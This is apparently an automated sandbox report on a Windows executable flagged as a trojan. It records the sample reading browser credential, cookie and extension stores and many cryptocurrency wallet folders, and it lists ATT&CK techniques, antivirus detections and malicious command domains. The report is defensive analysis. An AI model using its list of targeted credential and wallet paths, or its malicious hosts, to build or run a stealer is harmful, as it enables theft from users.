                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wf1Ps82LYF.exe PID: 7588, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: wf1Ps82LYF.exe PID: 7588, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (a leading number is the count of matching signatures for that technique; entries without a number had no hit)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 34 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 223 System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
wf1Ps82LYF.exe | 45% | ReversingLabs | Win32.Trojan.Symmi
wf1Ps82LYF.exe | 100% | Avira | TR/Crypt.XPACK.Gen
wf1Ps82LYF.exe | 100% | Joe Sandbox ML |

Three further antivirus tables (not labelled in the extracted text): No Antivirus matches
URLs

Source | Detection | Scanner | Label
https://tacitglibbr.biz/jLI | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz:443/apiDQ | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/sZ7 | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz:443/apil | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/apizT | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz:443/apin.txtPK | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/d | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/M | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/pil | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/apill | 100% | Avira URL Cloud | malware
Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tacitglibbr.biz | 104.21.50.161 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
Contacted URLs and Domains

Name | Malicious | Antivirus Detection | Reputation
sordid-snaked.cyou | false | | high
